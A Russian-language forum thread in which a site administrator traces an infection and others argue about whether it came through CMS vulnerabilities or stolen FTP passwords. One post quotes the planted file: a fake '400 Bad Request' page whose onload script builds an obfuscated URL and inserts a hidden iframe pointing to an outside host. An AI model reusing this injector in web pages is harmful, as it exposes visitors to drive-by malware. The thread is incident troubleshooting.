Трабла(админю сайт)
Правила форума
Убедительная просьба юзать теги [code] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
Убедительная просьба юзать теги [code] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
- manefesto
- Группенфюррер
- Сообщения: 6934
- Зарегистрирован: 2007-07-20 8:27:30
- Откуда: Пермь
- Контактная информация:
Re: Трабла(админю сайт)
пока не могу.....ftp закрыт на работе....к вечеру выложу
Услуги хостинговой компании Host-Food.ru
Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/
- lexy
- сержант
- Сообщения: 288
- Зарегистрирован: 2006-07-21 9:54:44
- Откуда: Волхов, ЛО
- Контактная информация:
Re: Трабла(админю сайт)
вирус-дроперы на сайт попадают обычно через дыры в CMS или скриптах(MySQL inject, register_globals в php.ini, корявки в правах на директории сайта, XSS). Было тут с месяцок назад на РБК на главной висел ))))))zg писал(а): 90% вирусов лузет через винду, когда на сайт через фтп что-то заливается
выложи index.php
Залить через FTP - только если специально.
- manefesto
- Группенфюррер
- Сообщения: 6934
- Зарегистрирован: 2007-07-20 8:27:30
- Откуда: Пермь
- Контактная информация:
Re: Трабла(админю сайт)
Вообщем нашел я таки вот файлы типа 400.shtml
Со следующим содержимым
Видать хостера сломали....или ftp пароль угнали.
Я сижу под фрей, порты закрыты....так что никого не боюсЪ
Со следующим содержимым
Код: Выделить всё
<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh='t';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab='src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('width','0');oE.setAttribute('height','0');oE.setAttribute('style','display:none');oE.setAttribute(ab,xx);document.body.appendChild(oE);">
<H1>Bad Request</H1>
There was an error in your request.
<HR>
<I><!--#echo var="HTTP_HOST" --></I>
</BODY></HTML>
Я сижу под фрей, порты закрыты....так что никого не боюсЪ
- lexy
- сержант
- Сообщения: 288
- Зарегистрирован: 2006-07-21 9:54:44
- Откуда: Волхов, ЛО
- Контактная информация:
Re: Трабла(админю сайт)
ИМХО все-таки CMS с дыркой, меняй пасс, обновляй движок сайтаmanefesto писал(а): Видать хостера сломали....или ftp пароль угнали.
- manefesto
- Группенфюррер
- Сообщения: 6934
- Зарегистрирован: 2007-07-20 8:27:30
- Откуда: Пермь
- Контактная информация:
Re: Трабла(админю сайт)
я понятия не имею как там и что обновлять....
Я только админю....картинки добавляю....редизигн маненько...
Я только админю....картинки добавляю....редизигн маненько...
-
- полковник
- Сообщения: 5845
- Зарегистрирован: 2007-12-07 13:51:33
- Откуда: Верх-Нейвинск
Re: Трабла(админю сайт)
не скажи, у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус.. через дыры, тоже можно но это сложнееlexy писал(а):Залить через FTP - только если специально.
- lexy
- сержант
- Сообщения: 288
- Зарегистрирован: 2006-07-21 9:54:44
- Откуда: Волхов, ЛО
- Контактная информация:
Re: Трабла(админю сайт)
не исключаю вероятности, но через дыры не сложнее, особенно когда отчет о найденой уязвимости, и, возможно, и эксплоит, опубликован. Есть статистика, что более половины админов не следят за багтраком и не закрывают вовремя дыры. Бери, качай сплойт да троянь сайты )))))))zg писал(а):не скажи, у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус.. через дыры, тоже можно но это сложнееlexy писал(а):Залить через FTP - только если специально.
у меня тут один клиент сам ручками два файлика подправил, залил и именно в них был вирус..
где гарантия, что он их с сайта уже в таком виде не слил? ))))))))))))))) а то, что комп того юзера с вирусом был, дык он ведь файлы вирусные тестил? далее по смыслу )))))))
а в случае заражения сайта через комп вебмастера дык это какая вероятность должна быть попадания трояна именно на комп дезигнера, вебмастера и пр? эффективность ниже плинтуса, а вирьмейкеры не альтруисты.
-
- полковник
- Сообщения: 5845
- Зарегистрирован: 2007-12-07 13:51:33
- Откуда: Верх-Нейвинск
Re: Трабла(админю сайт)
тутда их я заливал в cp1251... не кажется странным, что весь сайт в 1251, а два вирусных файла в UTF-8?lexy писал(а):где гарантия, что он их с сайта уже в таком виде не слил? ))))))))))))))) а то, что комп того юзера с вирусом был, дык он ведь файлы вирусные тестил? далее по смыслу )))))))
lexy писал(а):а в случае заражения сайта через комп вебмастера дык это какая вероятность должна быть попадания трояна именно на комп дезигнера, вебмастера и пр? эффективность ниже плинтуса, а вирьмейкеры не альтруисты.

Попробуй сломать сайт

- lexy
- сержант
- Сообщения: 288
- Зарегистрирован: 2006-07-21 9:54:44
- Откуда: Волхов, ЛО
- Контактная информация:
Re: Трабла(админю сайт)
отвечу тебе известным интернет-мемом: "на ЛОР быдло!"zg писал(а):ты сайтами то видать не занимаешься, и не в курсе, что вирусы под винду пишут,
сорри за бедность речи.
Ты по всей видимости ни тем ни другим толком не занимаешься. На сем дискуссию считаю закрытой
-
- полковник
- Сообщения: 5845
- Зарегистрирован: 2007-12-07 13:51:33
- Откуда: Верх-Нейвинск
Re: Трабла(админю сайт)
да... куда уж намlexy писал(а):Ты по всей видимости ни тем ни другим толком не занимаешься

- ADRE
- майор
- Сообщения: 2641
- Зарегистрирован: 2007-07-26 8:53:49
- Контактная информация:
Re: Трабла(админю сайт)
мда .... ставить надо скрипты все только на чтение пусть вирусы в темпах копашаться, да кстате в метном телекоме 2003 ftp сервак вынесли
половина городских сайтов заслала вирусов херову тучу всем

//del